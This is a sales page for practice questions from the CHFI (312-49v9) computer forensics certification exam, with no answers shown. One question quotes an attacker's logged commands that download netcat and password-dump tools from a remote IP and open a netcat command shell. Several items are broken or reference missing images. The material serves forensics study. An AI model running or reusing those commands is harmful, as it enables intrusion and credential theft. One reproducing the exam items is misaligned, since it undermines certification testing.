Weekend Special - 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: spcl70

312-49v9 PDF

$33

$109.99

3 Months Free Update

  • Printable Format
  • Value of Money
  • 100% Pass Assurance
  • Verified Answers
  • Researched by Industry Experts
  • Based on Real Exams Scenarios
  • 100% Real Questions

312-49v9 PDF + Testing Engine

$52.8

$175.99

3 Months Free Update

  • Exam Name: Computer Hacking Forensic Investigator (v9)
  • Last Update: Dec 8, 2024
  • Questions and Answers: 589
  • Free Real Questions Demo
  • Recommended by Industry Experts
  • Best Economical Package
  • Immediate Access

312-49v9 Engine

$39.6

$131.99

3 Months Free Update

  • Best Testing Engine
  • One Click installation
  • Recommended by Teachers
  • Easy to use
  • 3 Modes of Learning
  • State of Art Technology
  • 100% Real Questions included

312-49v9 Practice Exam Questions with Answers Computer Hacking Forensic Investigator (v9) Certification

Question # 6

Smith, a forensic examiner, was analyzing a hard disk image to find and acquire deleted sensitive files. He stumbled upon a $Recycle.Bin folder in the root directory of the disk. Identify the operating system in use.

A.

Windows 98

B.

Linux

C.

Windows 8.1

D.

Windows XP

Full Access
Question # 7

Which of the following tool captures and allows you to interactively browse the traffic on a network?

A.

Security Task Manager

B.

Wireshark

C.

ThumbsDisplay

D.

RegScanner

Full Access
Question # 8

Who is responsible for the following tasks?

A.

Non-forensics staff

B.

Lawyers

C.

System administrators

D.

Local managers or other non-forensic staff

Full Access
Question # 9

Which of the following refers to the process of the witness being questioned by the attorney who called the latter to the stand?

A.

Witness Authentication

B.

Direct Examination

C.

Expert Witness

D.

Cross Questioning

Full Access
Question # 10

Which code does the FAT file system use to mark the file as deleted?

A.

ESH

B.

5EH

C.

H5E

D.

E5H

Full Access
Question # 11

How many possible sequence number combinations are there in TCP/IP protocol?

A.

1 billion

B.

320 billion

C.

4 billion

D.

32 million

Full Access
Question # 12

To check for POP3 traffic using Ethereal, what port should an investigator search by?

A.

143

B.

25

C.

110

D.

125

Full Access
Question # 13

What does the 63.78.199.4(161) denotes in a Cisco router log?

Mar 14 22:57:53.425 EST: %SEC-6-IPACCESSLOGP: list internet-inbound denied udp 66.56.16.77(1029) -> 63.78.199.4(161), 1 packet

A.

Destination IP address

B.

Source IP address

C.

Login IP address

D.

None of the above

Full Access
Question # 14

What will the following Linux command accomplish?

dd if=/dev/mem of=/home/sam/mem.bin bs=1024

A.

Copy the master boot record to a file

B.

Copy the contents of the system folder to a file

C.

Copy the running memory to a file

D.

Copy the memory dump file to an image file

Full Access
Question # 15

What type of equipment would a forensics investigator store in a StrongHold bag?

A.

PDAPDA?

B.

Backup tapes

C.

Hard drives

D.

Wireless cards

Full Access
Question # 16

Which of the following acts as a network intrusion detection system as well as network intrusion prevention system?

A.

Accunetix

B.

Nikto

C.

Snort

D.

Kismet

Full Access
Question # 17

Harold is finishing up a report on a case of network intrusion, corporate spying, and embezzlement that he has been working on for over six months. He is trying to find the right term to use in his report to describe network-enabled spying. What term should Harold use?

A.

Spycrack

B.

Spynet

C.

Netspionage

D.

Hackspionage

Full Access
Question # 18

The process of restarting a computer that is already turned on through the operating system is called?

A.

Warm boot

B.

Ice boot

C.

Hot Boot

D.

Cold boot

Full Access
Question # 19

You have been given the task to investigate web attacks on a Windows-based server. Which of the following commands will you use to look at the sessions the machine has opened with other systems?

A.

Net sessions

B.

Net config

C.

Net share

D.

Net use

Full Access
Question # 20

What type of attack sends spoofed UDP packets (instead of ping packets) with a fake source address to the IP broadcast address of a large network?

A.

Fraggle

B.

Smurf scan

C.

SYN flood

D.

Teardrop

Full Access
Question # 21

The surface of a hard disk consists of several concentric rings known as tracks; each of these tracks has smaller partitions called disk blocks. What is the size of each block?

A.

512 bits

B.

512 bytes

C.

256 bits

D.

256 bytes

Full Access
Question # 22

When searching through file headers for picture file formats, what should be searched to find a JPEG file in hexadecimal format?

A.

FF D8 FF E0 00 10

B.

FF FF FF FF FF FF

C.

FF 00 FF 00 FF 00

D.

EF 00 EF 00 EF 00

Full Access
Question # 23

When making the preliminary investigations in a sexual harassment case, how many investigators are you recommended having?

A.

One

B.

Two

C.

Three

D.

Four

Full Access
Question # 24

What is the location of the binary files required for the functioning of the OS in a Linux system?

A.

/run

B.

/bin

C.

/root

D.

/sbin

Full Access
Question # 25

Data is striped at a byte level across multiple drives, and parity information is distributed among all member drives.

312-49v9 question answer

What RAID level is represented here?

A.

RAID Level 0

B.

RAID Level 5

C.

RAID Level 3

D.

RAID Level 1

Full Access
Question # 26

Which of the following tool enables a user to reset his/her lost admin password in a Windows system?

A.

Advanced Office Password Recovery

B.

Active@ Password Changer

C.

Smartkey Password Recovery Bundle Standard

D.

Passware Kit Forensic

Full Access
Question # 27

Where are files temporarily written in Unix when printing?

A.

/usr/spool

B.

/var/print

C.

/spool

D.

/var/spool

Full Access
Question # 28

A forensics investigator is searching the hard drive of a computer for files that were recently moved to the Recycle Bin. He searches for files in C:\RECYCLED using a command line tool but does not find anything. What is the reason for this?

A.

He should search in C:\Windows\System32\RECYCLED folder

B.

The Recycle Bin does not exist on the hard drive

C.

The files are hidden and he must use switch to view them

D.

Only FAT system contains RECYCLED folder and not NTFS

Full Access
Question # 29

Jacob is a computer forensics investigator with over 10 years experience in investigations and has written over 50 articles on computer forensics. He has been called upon as a qualified witness to testify the accuracy and integrity of the technical log files gathered in an investigation into computer fraud. What is the term used for Jacob testimony in this case?

A.

Justification

B.

Authentication

C.

Reiteration

D.

Certification

Full Access
Question # 30

Davidson Trucking is a small transportation company that has three local offices in Detroit Michigan. Ten female employees that work for the company have gone to an attorney reporting that male employees repeatedly harassed them and that management did nothing to stop the problem. Davidson has employee policies that outline all company guidelines, including awareness on harassment and how it will not be tolerated. When the case is brought to court, whom should the prosecuting attorney call upon for not upholding company policy?

A.

IT personnel

B.

Employees themselves

C.

Supervisors

D.

Administrative assistant in charge of writing policies

Full Access
Question # 31

The investigator wants to examine changes made to the system’s registry by the suspect program. Which of the following tool can help the investigator?

A.

TRIPWIRE

B.

RAM Capturer

C.

Regshot

D.

What’s Running

Full Access
Question # 32

In handling computer-related incidents, which IT role should be responsible for recovery, containment, and prevention to constituents?

A.

Security Administrator

B.

Network Administrator

C.

Director of Information Technology

D.

Director of Administration

Full Access
Question # 33

What is the first step taken in an investigation for laboratory forensic staff members?

A.

Packaging the electronic evidence

B.

Securing and evaluating the electronic crime scene

C.

Conducting preliminary interviews

D.

Transporting the electronic evidence

Full Access
Question # 34

Which of the following tasks DOES NOT come under the investigation phase of a cybercrime forensics investigation case?

A.

Data collection

B.

Secure the evidence

C.

First response

D.

Data analysis

Full Access
Question # 35

What is considered a grant of a property right given to an individual who discovers or invents a new machine, process, useful composition of matter or manufacture?

A.

Copyright

B.

Design patent

C.

Trademark

D.

Utility patent

Full Access
Question # 36

An expert witness is a __________________ who is normally appointed by a party to assist the formulation and preparation of a party’s claim or defense.

A.

Expert in criminal investigation

B.

Subject matter specialist

C.

Witness present at the crime scene

D.

Expert law graduate appointed by attorney

Full Access
Question # 37

Which tool does the investigator use to extract artifacts left by Google Drive on the system?

A.

PEBrowse Professional

B.

RegScanner

C.

RAM Capturer

D.

Dependency Walker

Full Access
Question # 38

Heather, a computer forensics investigator, is assisting a group of investigators working on a large computer fraud case involving over 20 people. These 20 people, working in different offices, allegedly siphoned off money from many different client accounts. Heather responsibility is to find out how the accused people communicated between each other. She has searched their email and their computers and has not found any useful evidence. Heather then finds some possibly useful evidence under the desk of one of the accused.

In an envelope she finds a piece of plastic with numerous holes cut out of it. Heather then finds the same exact piece of plastic with holes at many of the other accused peoples desks. Heather believes that the 20 people involved in the case were using a cipher to send secret messages in between each other. What type of cipher was used by the accused in this case?

A.

Grill cipher

B.

Null cipher

C.

Text semagram

D.

Visual semagram

Full Access
Question # 39

While looking through the IIS log file of a web server, you find the following entries:

312-49v9 question answer

What is evident from this log file?

A.

Web bugs

B.

Cross site scripting

C.

Hidden fields

D.

SQL injection is possible

Full Access
Question # 40

Which of the following stages in a Linux boot process involve initialization of the system’s hardware?

A.

BIOS Stage

B.

Bootloader Stage

C.

BootROM Stage

D.

Kernel Stage

Full Access
Question # 41

Using Linux to carry out a forensics investigation, what would the following command accomplish?

dd if=/usr/home/partition.image of=/dev/sdb2 bs=4096 conv=notrunc,noerror

A.

Search for disk errors within an image file

B.

Backup a disk to an image file

C.

Copy a partition to an image file

D.

Restore a disk from an image file

Full Access
Question # 42

Which of the following reports are delivered under oath to a board of directors/managers/panel of the jury?

A.

Written Formal Report

B.

Verbal Formal Report

C.

Verbal Informal Report

D.

Written Informal Report

Full Access
Question # 43

What feature of Windows is the following command trying to utilize?

312-49v9 question answer

A.

White space

B.

AFS

C.

ADS

D.

Slack file

Full Access
Question # 44

When operating systems mark a cluster as used but not allocated, the cluster is considered as _________

A.

Corrupt

B.

Bad

C.

Lost

D.

Unallocated

Full Access
Question # 45

Depending upon the jurisdictional areas, different laws apply to different incidents. Which of the following law is related to fraud and related activity in connection with computers?

A.

18 USC §1029

B.

18 USC §1030

C.

18 USC §1361

D.

18 USC §1371

Full Access
Question # 46

John is working on his company policies and guidelines. The section he is currently working on covers company documents; how they should be handled, stored, and eventually destroyed. John is concerned about the process whereby outdated documents are destroyed. What type of shredder should John write in the guidelines to be used when destroying documents?

A.

Strip-cut shredder

B.

Cross-cut shredder

C.

Cross-hatch shredder

D.

Cris-cross shredder

Full Access
Question # 47

Why would you need to find out the gateway of a device when investigating a wireless attack?

A.

The gateway will be the IP of the proxy server used by the attacker to launch the attack

B.

The gateway will be the IP of the attacker computer

C.

The gateway will be the IP used to manage the RADIUS server

D.

The gateway will be the IP used to manage the access point

Full Access
Question # 48

Which of the following standard represents a legal precedent sent in 1993 by the Supreme Court of the United States regarding the admissibility of expert witnesses’ testimony during federal legal proceedings?

A.

IOCE

B.

SWGDE & SWGIT

C.

Frye

D.

Daubert

Full Access
Question # 49

In the following email header, where did the email first originate from?

312-49v9 question answer

A.

Somedomain.com

B.

Smtp1.somedomain.com

C.

Simon1.state.ok.gov.us

D.

David1.state.ok.gov.us

Full Access
Question # 50

Paul is a computer forensics investigator working for Tyler & Company Consultants. Paul has been called upon to help investigate a computer hacking ring broken up by the local police. Paul begins to inventory the PCs found in the hackers hideout. Paul then comes across a PDA left by them that is attached to a number of different peripheral devices. What is the first step that Paul must take with the PDA to ensure the integrity of the investigation?

A.

Place PDA, including all devices, in an antistatic bag

B.

Unplug all connected devices

C.

Power off all devices if currently on

D.

Photograph and document the peripheral devices

Full Access
Question # 51

Which of the following files DOES NOT use Object Linking and Embedding (OLE) technology to embed and link to other objects?

A.

Portable Document Format

B.

MS-office Word Document

C.

MS-office Word OneNote

D.

MS-office Word PowerPoint

Full Access
Question # 52

A small law firm located in the Midwest has possibly been breached by a computer hacker looking to obtain information on their clientele. The law firm does not have any on-site IT employees, but wants to search for evidence of the breach themselves to prevent any possible media attention. Why would this not be recommended?

A.

Searching for evidence themselves would not have any ill effects

B.

Searching could possibly crash the machine or device

C.

Searching creates cache files, which would hinder the investigation

D.

Searching can change date/time stamps

Full Access
Question # 53

Smith, as a part his forensic investigation assignment, seized a mobile device. He was asked to recover the Subscriber Identity Module (SIM card) data in the mobile device. Smith found that the SIM was protected by a Personal Identification Number (PIN) code, but he was also aware that people generally leave the PIN numbers to the defaults or use easily guessable numbers such as 1234. He made three unsuccessful attempts, which blocked the SIM card. What can Jason do in this scenario to reset the PIN and access SIM data?

A.

He should contact the network operator for a Temporary Unlock Code (TUK)

B.

Use system and hardware tools to gain access

C.

He can attempt PIN guesses after 24 hours

D.

He should contact the network operator for Personal Unlock Number (PUK)

Full Access
Question # 54

Using Internet logging software to investigate a case of malicious use of computers, the investigator comes across some entries that appear odd.

312-49v9 question answer

From the log, the investigator can see where the person in question went on the Internet. From the log, it appears that the user was manually typing in different user ID numbers. What technique this user was trying?

A.

Parameter tampering

B.

Cross site scripting

C.

SQL injection

D.

Cookie Poisoning

Full Access
Question # 55

How often must a company keep log files for them to be admissible in a court of law?

A.

All log files are admissible in court no matter their frequency

B.

Weekly

C.

Monthly

D.

Continuously

Full Access
Question # 56

On an Active Directory network using NTLM authentication, where on the domain controllers are the passwords stored?

A.

SAM

B.

AMS

C.

Shadow file

D.

Password.conf

Full Access
Question # 57

When using an iPod and the host computer is running Windows, what file system will be used?

A.

iPod+

B.

HFS

C.

FAT16

D.

FAT32

Full Access
Question # 58

Which password cracking technique uses every possible combination of character sets?

A.

Rainbow table attack

B.

Brute force attack

C.

Rule-based attack

D.

Dictionary attack

Full Access
Question # 59

An on-site incident response team is called to investigate an alleged case of computer tampering within their company. Before proceeding with the investigation, the CEO informs them that the incident will be classified as low level. How long will the team have to respond to the incident?

A.

One working day

B.

Two working days

C.

Immediately

D.

Four hours

Full Access
Question # 60

Which US law does the interstate or international transportation and receiving of child pornography fall under?

A.

§18. U.S.C. 1466A

B.

§18. U.S.C 252

C.

§18. U.S.C 146A

D.

§18. U.S.C 2252

Full Access
Question # 61

Which among the following is an act passed by the U.S. Congress in 2002 to protect investors from the possibility of fraudulent accounting activities by corporations?

A.

HIPAA

B.

GLBA

C.

SOX

D.

FISMA

Full Access
Question # 62

The offset in a hexadecimal code is:

A.

The last byte after the colon

B.

The 0x at the beginning of the code

C.

The 0x at the end of the code

D.

The first byte after the colon

Full Access
Question # 63

The police believe that Melvin Matthew has been obtaining unauthorized access to computers belonging to numerous computer software and computer operating systems manufacturers, cellular telephone manufacturers, Internet Service Providers and Educational Institutions. They also suspect that he has been stealing, copying and misappropriating proprietary computer software belonging to the several victim companies. What is preventing the police from breaking down the suspects door and searching his home and seizing all of his computer equipment if they have not yet obtained a warrant?

A.

The Fourth Amendment

B.

The USA patriot Act

C.

The Good Samaritan Laws

D.

The Federal Rules of Evidence

Full Access
Question # 64

The use of warning banners helps a company avoid litigation by overcoming an employee assumed __________________________. When connecting to the company's intranet, network or Virtual Private Network(VPN) and will allow the company's investigators to monitor, search and retrieve information stored within the network.

A.

Right to work

B.

Right of free speech

C.

Right to Internet Access

D.

Right of Privacy

Full Access
Question # 65

The rule of thumb when shutting down a system is to pull the power plug. However, it has certain drawbacks. Which of the following would that be?

A.

Any data not yet flushed to the system will be lost

B.

All running processes will be lost

C.

The /tmp directory will be flushed

D.

Power interruption will corrupt the pagefile

Full Access
Question # 66

Diskcopy is:

A.

a utility by AccessData

B.

a standard MS-DOS command

C.

Digital Intelligence utility

D.

dd copying tool

Full Access
Question # 67

You are running known exploits against your network to test for possible vulnerabilities. To test the strength of your virus software, you load a test network to mimic your production network. Your software successfully blocks some simple macro and encrypted viruses. You decide to really test the software by using virus code where the code rewrites itself entirely and the signatures change from child to child, but the functionality stays the same. What type of virus is this that you are testing?

A.

Polymorphic

B.

Metamorphic

C.

Oligomorhic

D.

Transmorphic

Full Access
Question # 68

The efforts to obtain information before a trail by demanding documents, depositions, questioned and answers written under oath, written requests for admissions of fact and examination of the scene is a description of what legal term?

A.

Detection

B.

Hearsay

C.

Spoliation

D.

Discovery

Full Access
Question # 69

You are assisting in the investigation of a possible Web Server Hack. The company who called you stated that customers reported to them that whenever they entered the web address of the company in their browser, what they received was a porno graphic web site. The company checked the web server and nothing appears wrong. When you type in the IP address of the web site in your browser everything appears normal. What is the name of the attack that affects the DNS cache of the name resolution servers, resulting in those servers directing users to the wrong web site?

A.

ARP Poisoning

B.

DNS Poisoning

C.

HTTP redirect attack

D.

IP Spoofing

Full Access
Question # 70

In a forensic examination of hard drives for digital evidence, what type of user is most likely to have the most file slack to analyze?

A.

one who has NTFS 4 or 5 partitions

B.

one who uses dynamic swap file capability

C.

one who uses hard disk writes on IRQ 13 and 21

D.

one who has lots of allocation units per block or cluster

Full Access
Question # 71

The MD5 program is used to:

A.

wipe magnetic media before recycling it

B.

make directories on an evidence disk

C.

view graphics files on an evidence drive

D.

verify that a disk is not altered when you examine it

Full Access
Question # 72

You are working for a local police department that services a population of 1,000,000 people and you have been given the task of building a computer forensics lab. How many law-enforcement computer investigators should you request to staff the lab?

A.

8

B.

1

C.

4

D.

2

Full Access
Question # 73

You have been asked to investigate after a user has reported a threatening e-mail they have received from an external source. Which of the following are you most interested in when trying to trace the source of the message?

A.

The X509 Address

B.

The SMTP reply Address

C.

The E-mail Header

D.

The Host Domain Name

Full Access
Question # 74

Which response organization tracks hoaxes as well as viruses?

A.

NIPC

B.

FEDCIRC

C.

CERT

D.

CIAC

Full Access
Question # 75

Office Documents (Word, Excel and PowerPoint) contain a code that allows tracking the MAC or unique identifier of the machine that created the document. What is that code called?

A.

Globally unique ID

B.

Microsoft Virtual Machine Identifier

C.

Personal Application Protocol

D.

Individual ASCII string

Full Access
Question # 76

The following excerpt is taken from a honeypot log that was hosted at lab.wiretrip.net. Snort reported Unicode attacks from 213.116.251.162. The File Permission Canonicalization vulnerability (UNICODE attack) allows scripts to be run in arbitrary folders that do not normally have the right to run scripts. The attacker tries a Unicode attack and eventually succeeds in displaying boot.ini.

He then switches to playing with RDS, via msadcs.dll. The RDS vulnerability allows a malicious user to construct SQL statements that will execute shell commands (such as CMD.EXE) on the IIS server. He does a quick query to discover that the directory exists, and a query to msadcs.dll shows that it is functioning correctly. The attacker makes a RDS query which results in the commands run as shown below.

"cmd1.exe /c open 213.116.251.162 >ftpcom"

"cmd1.exe /c echo johna2k >>ftpcom"

"cmd1.exe /c echo haxedj00 >>ftpcom"

"cmd1.exe /c echo get nc.exe >>ftpcom"

"cmd1.exe /c echo get pdump.exe >>ftpcom"

"cmd1.exe /c echo get samdump.dll >>ftpcom"

"cmd1.exe /c echo quit >>ftpcom"

"cmd1.exe /c ftp -s:ftpcom"

"cmd1.exe /c nc -l -p 6969 -e cmd1.exe"

What can you infer from the exploit given?

A.

It is a local exploit where the attacker logs in using username johna2k

B.

There are two attackers on the system - johna2k and haxedj00

C.

The attack is a remote exploit and the hacker downloads three files

D.

The attacker is unsuccessful in spawning a shell as he has specified a high end UDP port

Full Access
Question # 77

If you see the files Zer0.tar.gz and copy.tar.gz on a Linux system while doing an investigation, what can you conclude?

A.

The system files have been copied by a remote attacker

B.

The system administrator has created an incremental backup

C.

The system has been compromised using a t0rnrootkit

D.

Nothing in particular as these can be operational files

Full Access
Question # 78

You are working as an independent computer forensics investigator and received a call from a systems administrator for a local school system requesting your assistance. One of the students at the local high school is suspected of downloading inappropriate images from the Internet to a PC in the Computer lab. When you arrive at the school, the systems administrator hands you a hard drive and tells you that he made a “simple backup copy” of the hard drive in the PC and put it on this drive and requests that you examine that drive for evidence of the suspected images. You inform him that a “simple backup copy” will not provide deleted files or recover file fragments.

What type of copy do you need to make to ensure that the evidence found is complete and admissible in future proceeding?

A.

Bit-stream Copy

B.

Robust Copy

C.

Full backup Copy

D.

Incremental Backup Copy

Full Access
Question # 79

____________________ is simply the application of Computer Investigation and analysis techniques in the interests of determining potential legal evidence.

A.

Network Forensics

B.

Computer Forensics

C.

Incident Response

D.

Event Reaction

Full Access
Question # 80

When cataloging digital evidence, the primary goal is to

A.

Make bit-stream images of all hard drives

B.

Preserve evidence integrity

C.

Not remove the evidence from the scene

D.

Not allow the computer to be turned off

Full Access
Question # 81

When conducting computer forensic analysis, you must guard against ______________ So that you remain focused on the primary job and insure that the level of work does not increase beyond what was originally expected.

A.

Hard Drive Failure

B.

Scope Creep

C.

Unauthorized expenses

D.

Overzealous marketing

Full Access
Question # 82

Bob has been trying to penetrate a remote production system for the past two weeks. This time however, he is able to get into the system. He was able to use the System for a period of three weeks. However, law enforcement agencies were recoding his every activity and this was later presented as evidence.

The organization had used a Virtual Environment to trap Bob. What is a Virtual Environment?

A.

A Honeypot that traps hackers

B.

A system Using Trojaned commands

C.

An environment set up after the user logs in

D.

An environment set up before a user logs in

Full Access
Question # 83

Harold wants to set up a firewall on his network but is not sure which one would be the most appropriate. He knows he needs to allow FTP traffic to one of the servers on his network, but he wants to only allow FTP-PUT. Which firewall would be most appropriate for Harold? needs?

A.

Circuit-level proxy firewall

B.

Packet filtering firewall

C.

Application-level proxy firewall

D.

Data link layer firewall

Full Access
Question # 84

Bill is the accounting manager for Grummon and Sons LLC in Chicago. On a regular basis, he needs to send PDF documents containing sensitive information through E-mail to his customers.

Bill protects the PDF documents with a password and sends them to their intended recipients.

Why PDF passwords do not offer maximum protection?

A.

PDF passwords can easily be cracked by software brute force tools

B.

PDF passwords are converted to clear text when sent through E-mail

C.

PDF passwords are not considered safe by Sarbanes-Oxley

D.

When sent through E-mail, PDF passwords are stripped from the document completely

Full Access
Question # 85

You are running through a series of tests on your network to check for any security vulnerabilities.

After normal working hours, you initiate a DoS attack against your external firewall. The firewall Quickly freezes up and becomes unusable. You then initiate an FTP connection from an external IP into your internal network. The connection is successful even though you have FTP blocked at the external firewall. What has happened?

A.

The firewall failed-bypass

B.

The firewall failed-closed

C.

The firewall ACL has been purged

D.

The firewall failed-open

Full Access
Question # 86

What does ICMP Type 3/Code 13 mean?

A.

Host Unreachable

B.

Administratively Blocked

C.

Port Unreachable

D.

Protocol Unreachable

Full Access
Question # 87

At what layer of the OSI model do routers function on?

A.

4

B.

3

C.

1

D.

5

Full Access
Question # 88

Sectors in hard disks typically contain how many bytes?

A.

256

B.

512

C.

1024

D.

2048

Full Access
Question # 89

Volatile Memory is one of the leading problems for forensics. Worms such as code Red are memory resident and do write themselves to the hard drive, if you turn the system off they disappear. In a lab environment, which of the following options would you suggest as the most appropriate to overcome the problem of capturing volatile memory?

A.

Use VMware to be able to capture the data in memory and examine it

B.

Give the Operating System a minimal amount of memory, forcing it to use a swap file

C.

Create a Separate partition of several hundred megabytes and place the swap file there

D.

Use intrusion forensic techniques to study memory resident infections

Full Access
Question # 90

George is the network administrator of a large Internet company on the west coast. Per corporate policy, none of the employees in the company are allowed to use FTP or SFTP programs without obtaining approval from the IT department. Few managers are using SFTP program on their computers. Before talking to his boss, George wants to have some proof of their activity. George wants to use Ethereal to monitor network traffic, but only SFTP traffic to and from his network.

What filter should George use in Ethereal?

A.

src port 23 and dst port 23

B.

udp port 22 and host 172.16.28.1/24

C.

net port 22

D.

src port 22 and dst port 22

Full Access
Question # 91

An Expert witness give an opinion if:

A.

The Opinion, inferences or conclusions depend on special knowledge, skill or training not within the ordinary experience of lay jurors

B.

To define the issues of the case for determination by the finder of fact

C.

To stimulate discussion between the consulting expert and the expert witness

D.

To deter the witness form expanding the scope of his or her investigation beyond the requirements of the case

Full Access
Question # 92

In the context of file deletion process, which of the following statement holds true?

A.

When files are deleted, the data is overwritten and the cluster marked as available

B.

The longer a disk is in use, the less likely it is that deleted files will be overwritten

C.

While booting, the machine may create temporary files that can delete evidence

D.

Secure delete programs work by completely overwriting the file in one go

Full Access
Question # 93

Why are Linux/Unix based computers better to use than Windows computers for idle scanning?

A.

Linux/Unix computers are easier to compromise

B.

Linux/Unix computers are constantly talking

C.

Windows computers are constantly talking

D.

Windows computers will not respond to idle scans

Full Access
Question # 94

Jim performed a vulnerability analysis on his network and found no potential problems. He runs another utility that executes exploits against his system to verify the results of the vulnerability test.

The second utility executes five known exploits against his network in which the vulnerability analysis said were not exploitable. What kind of results did Jim receive from his vulnerability analysis?

A.

False negatives

B.

False positives

C.

True negatives

D.

True positives

Full Access
Question # 95

Windows identifies which application to open a file with by examining which of the following?

A.

The File extension

B.

The file attributes

C.

The file Signature at the end of the file

D.

The file signature at the beginning of the file

Full Access
Question # 96

What type of file is represented by a colon (:) with a name following it in the Master File Table of NTFS disk?

A.

A compressed file

B.

A Data stream file

C.

An encrypted file

D.

A reserved file

Full Access
Question # 97

John and Hillary works at the same department in the company. John wants to find out Hillary's network password so he can take a look at her documents on the file server. He enables Lophtcrack program to sniffing mode. John sends Hillary an email with a link to Error! Reference source not found. What information will he be able to gather from this?

A.

Hillary network username and password hash

B.

The SID of Hillary network account

C.

The SAM file from Hillary computer

D.

The network shares that Hillary has permissions

Full Access
Question # 98

If an attacker's computer sends an IPID of 31400 to a zombie computer on an open port in IDLE scanning, what will be the response?

A.

The zombie will not send a response

B.

31402

C.

31399

D.

31401

Full Access
Question # 99

In conducting a computer abuse investigation you become aware that the suspect of the investigation is using ABC Company as his Internet Service Provider (ISP). You contact ISP and request that they provide you assistance with your investigation. What assistance can the ISP provide?

A.

The ISP can investigate anyone using their service and can provide you with assistance

B.

The ISP can investigate computer abuse committed by their employees, but must preserve the privacy of their customers and therefore cannot assist you without a warrant

C.

The ISP can't conduct any type of investigations on anyone and therefore can't assist you

D.

ISP's never maintain log files so they would be of no use to your investigation

Full Access
Question # 100

The ____________________ refers to handing over the results of private investigations to the authorities because of indications of criminal activity.

A.

Locard Exchange Principle

B.

Clark Standard

C.

Kelly Policy

D.

Silver-Platter Doctrine

Full Access
Question # 101

You are a computer forensics investigator working with local police department and you are called to assist in an investigation of threatening emails. The complainant has printer out 27 email messages from the suspect and gives the printouts to you. You inform her that you will need to examine her computer because you need access to the _________________________ in order to track the emails back to the suspect.

A.

Routing Table

B.

Firewall log

C.

Configuration files

D.

Email Header

Full Access
Question # 102

Jessica works as systems administrator for a large electronics firm. She wants to scan her network quickly to detect live hosts by using ICMP ECHO Requests. What type of scan is Jessica going to perform?

A.

Tracert

B.

Smurf scan

C.

Ping trace

D.

ICMP ping sweep

Full Access
Question # 103

You work as a penetration tester for Hammond Security Consultants. You are currently working on a contract for the state government of California. Your next step is to initiate a DoS attack on their network. Why would you want to initiate a DoS attack on a system you are testing?

A.

Show outdated equipment so it can be replaced

B.

List weak points on their network

C.

Use attack as a launching point to penetrate deeper into the network

D.

Demonstrate that no system can be protected against DoS attacks

Full Access
Question # 104

James is testing the ability of his routers to withstand DoS attacks. James sends ICMP ECHO requests to the broadcast address of his network. What type of DoS attack is James testing against his network?

A.

Smurf

B.

Trinoo

C.

Fraggle

D.

SYN flood

Full Access
Question # 105

Which of the following should a computer forensics lab used for investigations have?

A.

isolation

B.

restricted access

C.

open access

D.

an entry log

Full Access
Question # 106

What is a good security method to prevent unauthorized users from "tailgating"?

A.

Man trap

B.

Electronic combination locks

C.

Pick-resistant locks

D.

Electronic key systems

Full Access
Question # 107

When investigating a potential e-mail crime, what is your first step in the investigation?

A.

Trace the IP address to its origin

B.

Write a report

C.

Determine whether a crime was actually committed

D.

Recover the evidence

Full Access
Question # 108

You have used a newly released forensic investigation tool, which doesn't meet the Daubert Test, during a case. The case has ended-up in court. What argument could the defense make to weaken your case?

A.

The tool hasn't been tested by the International Standards Organization (ISO)

B.

Only the local law enforcement should use the tool

C.

The total has not been reviewed and accepted by your peers

D.

You are not certified for using the tool

Full Access
Question # 109

When examining a hard disk without a write-blocker, you should not start windows because Windows will write data to the:

A.

Recycle Bin

B.

MSDOS.sys

C.

BIOS

D.

Case files

Full Access
Question # 110

Corporate investigations are typically easier than public investigations because:

A.

the users have standard corporate equipment and software

B.

the investigator does not have to get a warrant

C.

the investigator has to get a warrant

D.

the users can load whatever they want on their machines

Full Access
Question # 111

In a FAT32 system, a 123 KB file will use how many sectors?

A.

34

B.

25

C.

11

D.

56

Full Access
Question # 112

In what way do the procedures for dealing with evidence in a criminal case differ from the procedures for dealing with evidence in a civil case?

A.

evidence must be handled in the same way regardless of the type of case

B.

evidence procedures are not important unless you work for a law enforcement agency

C.

evidence in a criminal case must be secured more tightly than in a civil case

D.

evidence in a civil case must be secured more tightly than in a criminal case

Full Access
Question # 113

Under which Federal Statutes does FBI investigate for computer crimes involving e-mail scams and mail fraud?

A.

18 U.S.C. 1029 Possession of Access Devices

B.

18 U.S.C. 1030 Fraud and related activity in connection with computers

C.

18 U.S.C. 1343 Fraud by wire, radio or television

D.

18 U.S.C. 1361 Injury to Government Property

E.

18 U.S.C. 1362 Government communication systems

F.

18 U.S.C. 1831 Economic Espionage Act

G.

18 U.S.C. 1832 Trade Secrets Act

Full Access
Question # 114

Which Intrusion Detection System (IDS) usually produces the most false alarms due to the unpredictable behaviors of users and networks?

A.

network-based IDS systems (NIDS)

B.

host-based IDS systems (HIDS)

C.

anomaly detection

D.

signature recognition

Full Access
Question # 115

A state department site was recently attacked and all the servers had their disks erased. The incident response team sealed the area and commenced investigation. During evidence collection they came across a zip disks that did not have the standard labeling on it. The incident team ran the disk on an isolated system and found that the system disk was accidentally erased. They decided to call in the FBI for further investigation. Meanwhile, they short listed possible suspects including three summer interns. Where did the incident team go wrong?

A.

They examined the actual evidence on an unrelated system

B.

They attempted to implicate personnel without proof

C.

They tampered with evidence by using it

D.

They called in the FBI without correlating with the fingerprint data

Full Access
Question # 116

What term is used to describe a cryptographic technique for embedding information into something else for the sole purpose of hiding that information from the casual observer?

A.

rootkit

B.

key escrow

C.

steganography

D.

Offset

Full Access
Question # 117

Your company uses Cisco routers exclusively throughout the network. After securing the routers to the best of your knowledge, an outside security firm is brought in to assess the network security.

Although they found very few issues, they were able to enumerate the model, OS version, and capabilities for all your Cisco routers with very little effort. Which feature will you disable to eliminate the ability to enumerate this information on your Cisco routers?

A.

Border Gateway Protocol

B.

Cisco Discovery Protocol

C.

Broadcast System Protocol

D.

Simple Network Management Protocol

Full Access
Question # 118

E-mail logs contain which of the following information to help you in your investigation? (Choose four.)

A.

user account that was used to send the account

B.

attachments sent with the e-mail message

C.

unique message identifier

D.

contents of the e-mail message

E.

date and time the message was sent

Full Access
Question # 119

Which part of Metasploit framework helps users to hide the data related to a previously deleted file or currently unused by the allocated file.

A.

Waffen FS

B.

RuneFS

C.

FragFS

D.

Slacker

Full Access
Question # 120

Centralized binary logging is a process in which many websites write binary and unformatted log data to a single log file. What extension should the investigator look to find its log file?

A.

.cbl

B.

.log

C.

.ibl

D.

.txt

Full Access
Question # 121

Which of the following Perl scripts will help an investigator to access the executable image of a process?

A.

Lspd.pl

B.

Lpsi.pl

C.

Lspm.pl

D.

Lspi.pl

Full Access
Question # 122

